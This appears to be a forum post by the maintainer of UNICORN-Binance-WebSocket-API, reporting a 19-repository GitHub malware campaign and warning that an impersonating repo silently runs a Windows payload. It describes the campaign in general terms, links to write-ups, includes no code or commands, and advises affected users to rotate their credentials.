u/oliver-zehentleitner

I documented a broader GitHub malware campaign that appears to include the fraudulent UNICORN-Binance-WebSocket-API repo I wrote about earlier.

At this point I have 19 confirmed repositories that decode to the same C2, share the same staged Windows payload flow, and reuse the same or highly similar utils/ dropper architecture.

The visible patterns also include repeated commit choreography, manipulated-looking stars/forks, and overlapping fork accounts across campaign repos.

Write-up:
https://blog.technopathy.club/nailproxy-space-github-malware-campaign

I am not asking anyone to touch the infrastructure or execute anything. If others want to independently validate additional public samples via static source review and metadata correlation, more confirmation would be useful.

Security warning for Binance users and developers:

A GitHub repository using the name UNICORN-Binance-WebSocket-API is not a legitimate UBWA console.

Based on the public startup path, it retrieves, decrypts, stages, and silently executes a Windows payload.

I maintain the legitimate UBWA project separately and documented the technical details here:
https://blog.technopathy.club/security-warning-fraudulent-github-repository-impersonating-unicorn-binance-websocket-api

If you ran that repository on Windows, treat the host as potentially compromised and rotate any exposed credentials.